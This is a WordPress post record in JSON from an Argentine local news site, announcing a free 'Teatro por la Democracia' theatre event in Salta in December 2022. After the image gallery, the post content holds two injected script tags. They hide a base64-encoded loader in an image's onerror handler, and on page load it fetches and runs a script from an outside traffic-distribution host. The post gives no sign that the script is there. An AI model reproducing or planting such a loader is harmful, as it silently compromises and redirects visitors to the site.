{"id":1911,"date":"2022-12-07T12:27:38","date_gmt":"2022-12-07T15:27:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1911"},"modified":"2025-08-14T00:28:28","modified_gmt":"2025-08-14T03:28:28","slug":"la-ciudad-invita-a-disfrutar-de-la-propuesta-teatro-por-la-democracia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1911","title":{"rendered":"La Ciudad\u00a0invita a disfrutar de la propuesta\u00a0\u00abTeatro por la Democracia\u00bb"},"content":{"rendered":"\n<h5 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#b20e37\"><strong><em>Por el D\u00eda de la Restauraci\u00f3n de la Democracia, el s\u00e1bado 10, desde las 18, en el anfiteatro del parque\u00a0San Mart\u00edn, habr\u00e1\u00a0obras teatrales, performances\u00a0e intervenciones esc\u00e9nicas, de compa\u00f1\u00edas independientes como el\u00a0Grupo NN y Grupo \u00abAlas\u00bb, entre otros. Entrada libre y gratuita.<\/em><\/strong><\/h5>\n\n\n\n<p>La Municipalidad de la ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a disfrutar de \u00abTeatro por la Democracia\u00bb, actividad que se desarrollar\u00e1 en simult\u00e1neo en todo el pa\u00eds&nbsp;para&nbsp;conmemorar un nuevo aniversario del D\u00eda de la Restauraci\u00f3n de la Democracia. La propuesta tendr\u00e1 lugar el s\u00e1bado 10, desde las 18, en el anfiteatro Cuchi Leguizam\u00f3n del parque&nbsp;San Mart\u00edn.<\/p>\n\n\n\n<p>La Secretaria&nbsp;de Cultura y Turismo&nbsp;municipal junto al Instituto Nacional del Teatro (INT), representaci\u00f3n Salta, y la Fundaci\u00f3n Cultura Creativa presentar\u00e1n obras teatrales, performances&nbsp;e intervenciones esc\u00e9nicas, de grupos independientes como el&nbsp;Grupo NN y Grupo \u00abAlas\u00bb, entre otros, quienes&nbsp;pondr\u00e1n en escena sus producciones desde las 18 y hasta las 21 en el&nbsp;anfiteatro con entrada libre y gratuita.<\/p>\n\n\n\n<p>Los espect\u00e1culos ser\u00e1n aptos para todo p\u00fablico y en el final el Grupo de Teatro Comunitario \u00abAlas\u00bb ofrecer\u00e1 una clase abierta de teatro a los presentes.<\/p>\n\n\n\n<p>\u00abTeatro para la Democracia\u00bb es una acci\u00f3n federal que se llevar\u00e1 a cabo en las 23 provincias y la Ciudad Aut\u00f3noma de Buenos Aires en forma&nbsp;simult\u00e1nea, para conmemorar un nuevo aniversario del D\u00eda de la Restauraci\u00f3n de la Democracia que&nbsp;fue el 10 de diciembre de 1983.<\/p>\n\n\n\n<p>\u00abEsta actividad es muy importante para nosotros porque consideramos que sin cultura y sin arte, no hay democracia posible.&nbsp;Con la convicci\u00f3n de que el teatro fortalece nuestra vida en democracia,&nbsp;tenemos la necesidad de conmemorar esta fecha presentando obras que tocan esta tem\u00e1tica\u00bb, manifest\u00f3 Manuel Ag\u00fcero, representante local del INT.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"720\" height=\"405\" data-id=\"1912\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-alas.jpg\" alt=\"\" class=\"wp-image-1912\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-alas.jpg 720w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-alas-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-alas-696x392.jpg 696w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"1024\" data-id=\"1913\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1913\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-1024x1024.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-300x300.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-150x150.jpeg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-768x768.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-696x696.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-1068x1068.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer-420x420.jpeg 420w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/teatro-por-la-democracia-flyer.jpeg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1914\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1914\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-1920x1080.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/cultura-en-el-anfi-6-scaled-1-2048x1152-1.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por el D\u00eda de la Restauraci\u00f3n de la Democracia, el s\u00e1bado 10, desde las 18, en el anfiteatro del parque\u00a0San Mart\u00edn, habr\u00e1\u00a0obras teatrales, performances\u00a0e intervenciones esc\u00e9nicas, de compa\u00f1\u00edas independientes como el\u00a0Grupo NN y Grupo \u00abAlas\u00bb, entre otros. Entrada libre y gratuita. La Municipalidad de la ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1914,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1911","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1911"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1911"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1911\/revisions"}],"predecessor-version":[{"id":7250,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1911\/revisions\/7250"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1914"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}